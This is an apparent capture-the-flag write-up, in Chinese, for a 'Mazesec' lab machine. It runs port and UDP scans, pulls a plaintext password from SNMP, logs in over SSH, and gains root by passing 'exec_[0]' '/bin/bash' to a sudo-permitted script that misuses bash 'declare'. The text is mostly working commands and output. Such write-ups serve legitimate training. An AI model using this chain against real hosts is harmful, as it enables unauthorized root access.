信息搜集
端口扫描
┌──(kali㉿kali)-[~]└─$ nmap-A-p-192.168.21.7 Starting Nmap7.99(https://nmap.org)at2026-10-07 05:38-0400Nmap scan reportfor192.168.21.7 Host is up(0.00065s latency). Not shown:65533closed tcp ports(reset)PORT STATE SERVICE VERSION22/tcpopensshOpenSSH8.4p1 Debian5+deb11u3(protocol2.0)|ssh-hostkey:|3072f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7(RSA)|256bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d(ECDSA)|_2563b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb(ED25519)80/tcpopenhttp Apache httpd2.4.62((Debian))|_http-title: Mazesec welcome u|_http-server-header: Apache/2.4.62(Debian)MAC Address: 08:00:27:66:46:FA(Oracle VirtualBox virtual NIC)Device type: general purpose|router Running: Linux4.X|5.X, MikroTik RouterOS7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux4.15-5.19, OpenWrt21.02(Linux5.4), MikroTik RouterOS7.2-7.5(Linux5.6.3)Network Distance:1hop Service Info: OS: Linux;CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS10.65ms192.168.21.7 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.Nmap done:1IP address(1hostup)scannedin10.59seconds漏洞利用
看一下80端口有什么
┌──(kali㉿kali)-[~]└─$curlhttp://192.168.21.7<!DOCTYPE html><htmllang="zh-CN"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width, initial-scale=1.0"><title>Mazesec welcome u</title><style>body{margin:0;padding:0;height: 100vh;display: flex;justify-content: center;align-items: center;background-color:#f5f5f5;font-family: Arial, sans-serif;}.quote{font-size:2.5rem;text-align: center;color:#333;padding: 20px;max-width: 800px;}</style></head><body><divclass="quote">The quieter you become, themoreyou are able to hear.</div></body></html>目录枚举
┌──(kali㉿kali)-[~]└─$ gobusterdir-uhttp://192.168.21.7-w/usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt-xhtml,php,txt,jpg,png,zip,git===============================================================Gobuster v3.8.2 by OJ Reeves(@TheColonial)&Christian Mehlmauer(@firefart)===============================================================[+]Url: http://192.168.21.7[+]Method: GET[+]Threads:10[+]Wordlist: /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-lowercase-2.3-big.txt[+]Negative Status codes:404[+]User Agent: gobuster/3.8.2[+]Extensions: html,php,txt,jpg,png,zip,git[+]Timeout: 10s===============================================================Starting gobusterindirectory enumeration mode===============================================================index.html(Status:200)[Size:796]server-status(Status:403)[Size:277]logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html(Status:403)[Size:277]Progress:9482016/9482016(100.00%)===============================================================Finished===============================================================没发现什么能走的方向了,在扫一下udp端口
┌──(kali㉿kali)-[~]└─$ nmap-sU--min-rate=10000192.168.21.7 Starting Nmap7.99(https://nmap.org)at2026-10-07 06:54-0400Nmap scan reportfor192.168.21.7 Host is up(0.00049s latency). Not shown:993open|filtered udp ports(no-response)PORT STATE SERVICE161/udpopensnmp MAC Address: 08:00:27:66:46:FA(Oracle VirtualBox virtual NIC)Nmap done:1IP address(1hostup)scannedin0.99seconds看一下snmp有什么https://hacktricks.wiki/network-services-pentesting/pentesting-snmp/index.html
┌──(kali㉿kali)-[~]└─$ snmpbulkwalk-cpublic-v2c192.168.21.7 iso.3.6.1.2.1.25.4.2.1.4.383=STRING:"service --user welcome --password mMOq2WWONQiiY8TinSRF --host localhost --port 8080"使用账号密码尝试登陆一下
┌──(kali㉿kali)-[~]└─$sshwelcome@192.168.21.7 The authenticity ofhost'192.168.21.7 (192.168.21.7)'can't be established. ED25519 key fingerprint is: SHA256:O2iH79i8PgOwV/Kp8ekTYyGMG8iHT+YlWuYC85SbWSQ This host key is known by the following other names/addresses: ~/.ssh/known_hosts:1: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.21.7' (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html welcome@192.168.21.7's password: Linux1134.19.0-27-amd64#1 SMP Debian 4.19.316-1 (2024-06-25) x86_64The programs included with the Debian GNU/Linux system arefreesoftware;the exact distribution termsforeach program are describedinthe individual filesin/usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Jan1408:32:232026from192.168.3.94 welcome@113:~$iduid=1000(welcome)gid=1000(welcome)groups=1000(welcome)权限提升
welcome@113:~$ls-latotal24drwxr-xr-x2welcome welcome4096Jan142026.drwxr-xr-x3root root4096Apr112025..lrwxrwxrwx1root root9Jan142026.bash_history ->/dev/null -rw-r--r--1welcome welcome220Apr112025.bash_logout -rw-r--r--1welcome welcome3526Apr112025.bashrc -rw-r--r--1welcome welcome807Apr112025.profile -rw-r--r--1root root44Jan142026user.txt welcome@113:~$sudo-lMatching Defaults entriesforwelcome on113: env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User welcome may run the following commands on113:(ALL)NOPASSWD: /opt/113.sh welcome@113:~$cat/opt/113.sh#!/bin/bashsandbox=$(mktemp-d)cd$sandboxif["$#"-ne3];thenexitfiif["$3"!="mazesec"]thenecho"\$3must be mazesec"exitelse/bin/cp /usr/bin/mazesec$sandboxexec_="$sandbox/mazesec"fi//只检查了字符串exec_。如果传入exec_[0],declare会把exec_变成数组,并设置第0个元素为/bin/bash。之后$exec_等价于${exec_[0]},于是执行/bin/bash,而脚本本身是通过sudo以root运行的,所以得到root shellif["$1"="exec_"];thenexitfideclare--"$1"="$2"$exec_welcome@113:~$sudo/opt/113.sh'exec_[0]''/bin/bash'mazesec root@113:/tmp/tmp.fLo2tSwt6k# iduid=0(root)gid=0(root)groups=0(root)